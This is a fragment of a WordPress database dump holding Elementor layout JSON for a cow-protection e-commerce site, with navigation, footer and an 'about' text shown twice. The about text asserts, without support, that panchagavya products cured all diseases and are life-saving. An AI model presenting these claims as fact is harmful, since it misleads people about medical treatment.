],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8c0b28\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"95efe94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7835249\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"4d2132d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d93d97\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af65679\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8bf0fa9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"34c6896\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b99eef9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e922c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a567dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"8033f94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ed7377\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38dac29\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b8317a\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb293a5\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"124a633\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"50353b1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12165,1998,'_elementor_page_assets','a:0:{}'),(12174,2000,'_elementor_edit_mode','builder'),(12175,2000,'_elementor_template_type','wp-page'),(12176,2000,'_elementor_version','3.7.8'),(12177,2000,'_wp_page_template','elementor_canvas'),(12178,2000,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8c0b28\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"95efe94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7835249\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"4d2132d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d93d97\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af65679\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8bf0fa9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"34c6896\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b99eef9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e922c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a567dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"8033f94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ed7377\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38dac29\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b8317a\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb293a5\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"124a633\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"50353b1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by 